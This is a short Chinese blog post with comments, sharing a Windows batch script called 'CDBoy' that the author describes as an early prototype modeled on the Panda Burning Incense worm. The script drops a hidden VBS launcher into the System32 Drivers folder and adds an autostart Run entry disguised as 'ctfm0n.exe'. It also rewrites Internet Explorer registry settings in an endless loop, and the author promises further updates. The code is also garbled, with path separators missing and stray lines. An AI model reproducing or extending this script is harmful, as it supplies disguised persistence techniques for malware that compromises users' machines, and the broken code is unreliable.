CDBoy的雏形->
***************************************
::这是win下的一个批处理程序,里边 包含了熊猫烧香的部分思想,有待更新-_-
@echo off
echo set ws=wscript.createobject(“wscript.shell”) > C:WINDOWSSystem32DriversCDBoy.vbs
echo ws.run “CDBoy.bat 1 /start”,0 >> C:WINDOWSSystem32DriversCDBoy.vbs
:again
ping -n 6 localhost > nul
if %1 == 1 (
echo Windows Registry Editor Version 5.00 > CDBoy.reg
echo [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] >> CDBoy.reg
echo “ctfm0n.exe”=”C:WINDOWSSystem32DriversCDBoy.vbs” >> CDBoy.reg
echo [HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain] >> CDBoy.reg
echo “Window Title”=”CDBoy”
echo [HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel] >>CDBoy.reg
echo “homepage”=dword:00000001 >> CDBoy.reg
REGEDIT
echo [HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionPoliciessystem] >> CDBoy.reg
echo “DisableRegistryTools”=dword:00000000 >> CDBoy.reg
) else (
echo Windows Registry Editor Version 5.00 > CDBoy.reg
echo [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] >> CDBoy.reg
echo “ctfm0n.exe”=- >> CDBoy.reg
)
if exist CDBoy.reg (
regedit /s CDBoy.reg
del CDBoy.reg
)
goto again
What?
LikeLike
这是一个win下的批处理,里边有熊猫烧香(WHBoy)的一些思想,后边会不断更新的,暂时性里边没有破坏性的代码。
LikeLike